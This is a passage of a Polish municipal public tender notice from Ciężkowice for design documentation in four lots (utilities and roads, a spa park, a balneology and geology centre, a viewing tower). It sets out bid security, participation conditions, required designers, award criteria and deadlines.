- Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. 2004 Nr 130, poz. 1389);
- Rozporządzenia  Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 roku w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z dnia 27 kwietnia 2012 r., poz. 462),
i ma umożliwić realizację zamówienia publicznego na roboty budowlane, zgodnie z ustawą z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych (Dz.U. z 2013 r. poz. 907 ).
5. Jeżeli w jakimkolwiek dokumencie, stanowiącym element, wchodzący w skład przedmiotu zamówienia (Projekt budowlany, Kosztorys, Przedmiar robót, Specyfikacja Techniczna, itp.)  w przypadku uzasadnionym specyfiką zamówienia Wykonawca/Projektant użyje nazwy własnej produktu, nazwy producenta itp. musi obok tej nazwy użyć sformułowania lub równoważny oraz opisać parametry równoważności.
6. Wynagrodzenie Wykonawcy za wykonanie przedmiotu zamówienia przyjmuje się jako ryczałtowe  (podane jako odrębne ceny brutto dla każdej z wydzielonych części zamówienia, dla których Wykonawca składa ofertę), a wysokość wynagrodzenia ustala się na podstawie złożonej przez niego oferty. Definicję tego wynagrodzenia określa art. 632. § 1 K.C. -  Jeżeli strony umówiły się o wynagrodzenie ryczałtowe, przyjmujący zamówienie nie może żądać podwyższenia wynagrodzenia, chociażby w czasie zawarcia umowy nie można było przewidzieć rozmiaru lub kosztów prac. 
7. Zapłata przez Zamawiającego wynagrodzenia Wykonawcy nastąpi na wskazany rachunek bankowy Wykonawcy, w terminie określonym w umowie.
8. W okresie trwania umowy cena oferty jest stała. Zamawiający nie przewiduje możliwości waloryzacji ceny ofertowej.
9. Warunki realizacji zamówienia zawarte zostały również we wzorze umowy stanowiącym integralną część SIWZ.

Szczegółowy opis elementów przedmiotu zamówienia stanowią załączniki: 
Załącznik Nr 9 Założenia architektoniczne i metodologiczne Źródlanego szlaku wraz 
z określeniem poszczególnych elementów i funkcji obiektów na szlaku.
Załącznik Nr 10 Schemat połączeń funkcjonalnych pomieszczeń Dom wody - centrum balneologii i geologii.
Załącznik Nr 11 Wytyczne koncepcyjne dla systemów i rozwiązań wchodzących w skład produktu turystycznego Pogórza Ciężkowickiego - Wybrane gminy i obszary.
Załącznik Nr 12 Wytyczne koncepcyjne dla systemów i rozwiązań wchodzących w skład produktu turystycznego Pogórza Ciężkowickiego - Dom wody - centrum balneologii i geologii..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.30.00.00-1, 71.32.00.00-7, 71.42.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości, która została określona poniżej - dla poszczególnych Części zamówienia, tj.:
- dla Części I zamówienia:  1 700,00 zł (słownie: jeden tysiąc siedemset złotych 00/100);
- dla Części II zamówienia:  3 000,00 zł (słownie: trzy tysiące złotych 00/100);
- dla Części III zamówienia:  3 200,00 zł (słownie: trzy tysiące dwieście złotych 00/100);
- dla Części IV zamówienia:  1 000,00 zł (słownie: jeden tysiąc złotych 00/100).
2.Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy Pzp, tj.:
1)	pieniądzu (przelewem, a nie gotówką w kasie Urzędu!),
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 ze zm.).
3.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
Krakowski Bank  Spółdzielczy O/Ciężkowice Nr 09 8591 0007 0290 0000 2118 0020
5.W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego w Ciężkowicach ul. Tysiąclecia 19, 33-190 Ciężkowice w Kasie pok. 24, 
a kserokopię dokumentu poświadczoną za zgodność z oryginałem należy załączyć do oferty.
7.Niewniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawcy wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty, wykonali co najmniej jedną usługę projektową, podobną do objętych przedmiotem zamówienia, i tak w ramach poszczególnych części zamówienia: 
- Za usługę podobną dla części I zamówienia Zamawiający uzna projekt uzbrojenia terenu w zakresie: budowy sieci wodnej i sieci kanalizacyjnej o długości co najmniej: 0,5 km sieć wodociągowa i 0,5 km sieć kanalizacyjna oraz projekt przebudowy lub budowy drogi o dł. min. 600 m i projekt parkingu o pow. min. 300 m2  za łączną kwotę min. 60 000,00 zł brutto;

- Za usługę podobną dla części II zamówienia Zamawiający uzna projekt zagospodarowania terenów zieleni z elementami małej architektury za kwotę min. 110 000,00 zł brutto; 

- Za usługę podobną dla części III zamówienia Zamawiający uzna projekt obiektu kubaturowego o powierzchni użytkowej minimum 500 m2, z zapleczem
socjalnym, wyposażony w instalacje wewnętrzne wraz z projektem
zagospodarowania terenu za kwotę min. 120 000,00  zł brutto; 
- Za usługę podobną dla części IV zamówienia Zamawiający uzna projekt wieży widokowej lub podobnego obiektu za kwotę min. 35 000,00 zł brutto. 

Ocena spełniania tego warunku dla poszczególnych części zostanie dokonana w oparciu o złożone na potwierdzenie wyżej wymienionego warunku przez Wykonawcę dokumenty, dowody oraz oświadczenia, tj. wykaz wykonanych usług zawierający następujące informacje; przedmiot usługi (tytuł dokumentacji projektowej), szczegółowy zakres dokumentacji (w tym wykaz branż), termin realizacji, nazwa zamawiającego (odbierającego) dokumentację, wartość usługi wraz z dokumentami potwierdzającymi (dowodami, o których mowa w par. 1 ust. 2 pkt 1 albo 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013, poz. 231), że usługi te zostały wykonane należycie; oraz w oparciu o złożone oświadczenia, zgodnie z zasadą: spełnia - nie spełnia. Przy ocenie spełniania nin. Warunku przez wykonawców wspólnie ubiegających się o udzielenie zamówienia wielkości stanowiące o spełnieniu warunku będą zsumowane. Łączne nie spełnienie nin. warunku spowoduje wykluczenie wykonawcy

Wymienione wyżej usługi mogą być wykonane, łącznie w jednym zamówieniu, lub w oddzielnych zamówieniach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawcy wykażą, że będą dysponować odpowiednimi osobami które będą wykonywać zamówienie, w tym co najmniej:
dla części I zamówienia:
- Projektantem branży instalacyjnej z zakresu sieci, instalacji i urządzeń kanalizacyjnych, sanitarnych i wodociągowych - posiadającym uprawnienia budowlane bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającym doświadczenie w wykonywaniu dokumentacji projektowej (co najmniej projekt budowlany) dla zadania związanego z budową sieci wodociągowej o dł. min. 0,5 km i sieci kanalizacyjnej o dł. min. 0,5 km
- Projektantem branży drogowej posiadającym uprawnienia budowlane do projektowania w specjalności drogowej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającym doświadczenie w wykonywaniu dokumentacji projektowej (co najmniej 1 projekt budowlany) dla zadania związanego z budową lub przebudową drogi o dł. min. 600m oraz powierzchni parkingowej o pow. min. 300 m2
 - Projektantem branży elektrycznej posiadającym uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie w zakresie sieci, instalacji i urządzeń elektrycznych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającym doświadczenie w wykonywaniu dokumentacji projektowej (co najmniej 1 projekt budowlany) dla zadania związanego z budową oświetlenia ulicznego
dla części II zamówienia:
- Projektantem branży architektonicznej - posiadającym uprawnienia budowlane do projektowania w specjalności architektonicznej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającym doświadczenie w wykonywaniu dokumentacji projektowej (co najmniej 1 projekt budowlany) dla zadania związanego z zagospodarowaniem terenów parkowych, rekreacyjnych, parkowych, itp.  z elementami małej architektury 
- Projektantem branży instalacyjnej z zakresu sieci, instalacji i urządzeń kanalizacyjnych, sanitarnych i wodociągowych - posiadającym uprawnienia budowlane bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającym doświadczenie w wykonywaniu dokumentacji projektowej (co najmniej 1 projekt budowlany) dla zadania związanego z budową instalacji wodnej i kanalizacyjnej
- Projektantem terenów zielonych posiadającym doświadczenie w wykonywaniu dokumentacji projektowej (minimum 1 projekt) dla zadania związanego z zagospodarowaniem terenów zielonych (parku, terenu rekreacyjnego, ogrodu itp.) 
- Projektantem systemów multimedialnych posiadającym doświadczenie w wykonywaniu dokumentacji projektowej w zakresie systemów multimedialnych polegającej na wykonaniu dokumentacji wykonawczej dla co najmniej jednej instalacji multimedialnej (z funkcją edukacyjną, wystawową itp.) wykorzystującej technologie interaktywne i  nowoczesne technologie elektroniczne 
dla części III zamówienia:
- Projektantem branży architektonicznej - posiadającym uprawnienia budowlane do projektowania w specjalności architektonicznej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającym doświadczenie w wykonywaniu dokumentacji projektowej (co najmniej  1 projekt budowlany) dla zadania związanego z budową obiektu kubaturowego o powierzchni użytkowej minimum 500 m2
- Projektantem  branży konstrukcyjnej posiadającym uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającym doświadczenie w wykonywaniu dokumentacji projektowej (co najmniej 1 projekt budowlany i wykonawczy) dla zadania związanego z budową obiektu kubaturowego o powierzchni użytkowej minimum 500 m2
- Projektantem branży instalacyjnej z zakresu sieci, instalacji i urządzeń kanalizacyjnych, sanitarnych i wodociągowych - posiadającym uprawnienia budowlane bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającym doświadczenie w wykonywaniu dokumentacji projektowej (co najmniej  1 projekt budowlany) dla zadania związanego z budową wewnętrznych instalacji sanitarnych w budynku o powierzchni użytkowej minimum 500 m2
- Projektantem branży elektrycznej posiadającym uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie w zakresie sieci, instalacji i urządzeń elektrycznych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającym doświadczenie w wykonywaniu dokumentacji projektowej (co najmniej 1 projekt budowlany) dla zadania związanego z budową wewnętrznej instalacji elektrycznej w budynku o powierzchni użytkowej minimum 500 m2
 - Projektantem systemów multimedialnych posiadającym doświadczenie w wykonywaniu dokumentacji projektowej w zakresie systemów multimedialnych polegającej na wykonaniu dokumentacji wykonawczej dla co najmniej jednej instalacji multimedialnej (z funkcją edukacyjną, wystawową itp.) wykorzystującej technologie interaktywne i  nowoczesne technologie elektroniczne
- Projektant aranżacji wnętrz posiadającym doświadczenie w wykonywaniu dokumentacji projektowej w zakresie aranżacji wnętrz
dla części IV zamówienia:
- Projektantem branży architektonicznej - posiadającym uprawnienia budowlane do projektowania w specjalności architektonicznej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającym doświadczenie w wykonywaniu dokumentacji projektowej (co najmniej 1 projekt budowlany) dla zadania związanego z budową wieży widokowej lub podobnego obiektu
- Projektantem branży elektrycznej posiadającym uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie w zakresie sieci, instalacji i urządzeń elektrycznych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów
 - Projektantem systemów multimedialnych posiadającym doświadczenie w wykonywaniu dokumentacji projektowej w zakresie systemów multimedialnych polegającej na wykonaniu dokumentacji wykonawczej dla co najmniej jednej instalacji multimedialnej (z funkcją edukacyjną, wystawową itp.) wykorzystującej technologie interaktywne i  nowoczesne technologie elektroniczne
Ocena spełniania tego warunku zostanie dokonana w oparciu o złożone na potwierdzenie wyżej wymienionego warunku przez Wykonawcę dokumenty, tj. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, zawierający następujące informacje: 1. imięnazwisko osoby; 2.Proponowana funkcja w realizacji zamówienia 3. Doświadczenie. 4 Opis posiadanych kwalifikacji zawodowych (w tym nr i rodzaj uprawnień oraz nr wpisu do właściwej izby samorządu zawodowego)5.wykształcenie, 6. Podstawa dysponowania osobami (punkt 4  dotycz wyłącznie  projektantów branży architektonicznej, konstrukcyjnej instalacyjnej, drogowej, elektrycznej) oraz w oparciu o złożone oświadczenia, zgodnie z zasadą: spełnia - nie spełnia.

Zgodnie z art. 12 a ustawy Prawo budowlane z dnia 7 lipca 1994r. (tj. Dz.U.2013 poz.1409) w zakresie warunku udziału w postępowaniu określonego powyżej, w odniesieniu do obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), uznaje się uprawnienia do wykonywania zawodu, które spełniają warunki określone w Ustawie z dn. 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.2008.63.394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawcy wykażą, że są ubezpieczeni od odpowiedzialności cywilnej w zakresie działalności związanej z przedmiotem zamówienia na kwotę, określoną w zależności od części zamówienia, tj.:
- dla Części I zamówienia na kwotę, co najmniej 75 000,00 złotych (słownie: siedemdziesiąt pięć tysięcy złotych 00/100);
- dla Części II zamówienia na kwotę, co najmniej 140 000,00 złotych (słownie: sto czterdzieści tysięcy złotych 00/100);
- dla Części III zamówienia na kwotę, co najmniej 150 000,00 złotych (słownie: sto pięćdziesiąt tysięcy złotych 00/100);
- dla Części II zamówienia na kwotę, co najmniej 41 000,00 złotych (słownie: czterdzieści jeden tysięcy złotych 00/100);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>- dla części I zamówienia - projekt uzbrojenia terenu w zakresie: budowy sieci wodnej i sieci kanalizacyjnej o długości co najmniej: 0,5 km sieć wodociągowa i 0,5 km sieć kanalizacyjna oraz projekt przebudowy lub budowy drogi o dł. min. 600 m i projekt parkingu o pow. min. 300 m2  za łączną kwotę min. 60 000,00 zł brutto;
- dla części II zamówienia - projekt zagospodarowania terenów zieleni z elementami małej architektury za kwotę min. 110 000,00 zł brutto;
- dla części III zamówienia - projekt obiektu kubaturowego o powierzchni użytkowej minimum 500 m2, z zapleczem
socjalnym, wyposażony w instalacje wewnętrzne wraz z projektem
zagospodarowania terenu za kwotę min. 120 000,00  zł brutto;
- dla części IV zamówienia - projekt wieży widokowej lub podobnego obiektu za kwotę min. 35 000,00 zł brutto.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Skrócenie terminu wykonania zamówienia - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach:
a.	Gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT);
b.	Zmiany osób i podmiotów zdolnych do wykonania zamówienia, w przypadku zdarzeń losowych niezależnych od Wykonawcy, na uzasadnione wystąpienie Wykonawcy;
c.	Zmiany którejkolwiek z osób wskazanych w ofercie jako uczestniczącej w wykonaniu zamówienia w przypadku sytuacji niezależnej od Wykonawcy lub na żądanie Zamawiającego jeżeli nie wywiązuje się ona z nałożonych obowiązków;
d.	Zmiany wskutek wystąpienie okoliczności, których Zamawiający nie był w stanie przewidzieć, pomimo zachowania należytej staranności;
e.	Gdy nastąpi konieczność sposobu wykonania przedmiotu zamówienia na skutek zmiany zasad finansowania zadania wynikającego z podpisanych przez Zamawiającego umów z Instytucjami Pośredniczącymi;
f.	Zmiany zapisów umowy będących wynikiem realizacji przez Zamawiającego uprawnień z tytułu rękojmi lub gwarancji na wykonane usługi;
g.	Zmiany dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, numerów kont bankowych oraz innych danych identyfikacyjnych;
h.	Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy;
i.	Dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania o udzielenie zamówienia publicznego jak również na zakres zamówienia (przedmiot).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.malopolska.pl/ugciezkowice<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ciężkowice
ul. Tysiąclecia 19
33-190 Ciężkowice
pok. nr 25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2015 godzina 10:00, miejsce: Urząd Gminy Ciężkowice
ul. Tysiąclecia 19
33-190 Ciężkowice
pok. nr 33.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach 
Małopolskiego Regionalnego Programu Operacyjnego 
Działanie 9.3 Przygotowanie inwestycji strategicznych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowej budowy uzbrojenia terenu na potrzeby niezbędnej infrastruktury komunalnej dla Międzynarodowego Centrum Edukacyjno-Naukowego (MCE-N) oraz  Parku Zdrojowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wykonanie projektu budowlanego infrastruktury wodnej i kanalizacyjnej niezbędnej do zaopatrzenia w media MCE-N, jak i zlokalizowanego w jego sąsiedztwie Parku Zdrojowego - niezbędne w tym zakresie jest zaprojektowanie odcinka sieci wodociągowej i odcinka sieci kanalizacyjnej, jak również dodatkowej sieci kanalizacyjnej odprowadzającej wodę mineralną zużytą do celów leczniczych. Dodatkowo w zakres zadania wchodzi wykonanie projektu przebudowy istniejącej drogi dojazdowej wraz z budową miejsc postojowych, budowy chodnika wzdłuż drogi oraz oświetlenia ulicznego zasilanego z sieci elektrycznej lub z wykorzystaniem odnawialnych źródeł energii, a także projektu budowy parkingów dla potrzeb Parku Zdrojowego. W ramach zadania przewiduje się: - budowę sieci wodociągowej o długości ok. 950 m (dz. nr: 904, 995, 997, 913/1, 913/2, 913/3 w Ciężkowicach); - budowę sieci kanalizacji sanitarnej o długości ok. 1,5 km (dz. nr: 914/5, 992/15, 1001, 999, 904, 993, 1013/1, 1013/2, 1013/3, 995, 992/11) oraz budowę odcinka kanalizacji o długości ok. 0,4 km (dz. nr: 992/11, 997) wraz z niezbędną infrastrukturą umożliwiającą odprowadzenie zużytej wody z kąpieli leczniczych do sieci kanalizacji sanitarnej; - przebudowę drogi dojazdowej i stanowiącej połączenie MCE-N z Rezerwatem Skamieniałe Miasto i Skalną basztą wraz z budową odwodnienia układu drogowego (dz. nr: 904, 997, 992/15, 993, 994, 996, 1013/1 1013/2, 1013/3, 995, 1010, 992/11, 1004, 1005); - budowę chodnika wzdłuż drogi dojazdowej o długości ok. 995 km (dz. nr: 904, 997, 992/15, 993, 994, 996, 1013/1 1013/2, 1013/3, 995, 1010, 992/11, 1004, 1005) oraz miejsc postojowych (dz. nr 992/11, 1050, 1051); - budowę oświetlenia ulicznego wzdłuż ww. drogi dojazdowej (zasilanego z sieci elektrycznej lub z wykorzystaniem energii ze źródeł odnawialnych) na długości ok. 995 km (dz. nr: 904, 997, 992/15, 993, 994, 996, 1013/1 1013/2, 1013/3, 995, 1010, 992/11, 1004, 1005); - budowa parkingów na potrzeby Parku Zdrojowego o łącznej powierzchni ok. 7000 m2 (dz. nr 992/11, 992/1, 1010). Przedmiot zamówienia w części I obejmuje: - Mapa zasadnicza do celów opiniodawczych w niezbędnym zakresie - 1 kpl. dla Zamawiającego oraz egzemplarze do uzgodnień, - Wyrysy i wypisy z mapy ewidencji gruntów w niezbędnym zakresie - 1 kpl. dla Zamawiającego oraz egzemplarze do uzgodnień, - Materiały do wniosku o uzyskanie Decyzji o środowiskowych uwarunkowaniach realizacji zamierzenia inwestycyjnego oraz wniosek wraz z jego złożeniem i uzyskaniem decyzji (w przypadku takiej konieczności - dot. parkingów i odcinka sieci kanalizacyjnej) - 1 egz. dla Zamawiającego oraz egzemplarze do złożenia wniosku, - Materiały do wniosku o ustalenie lokalizacji 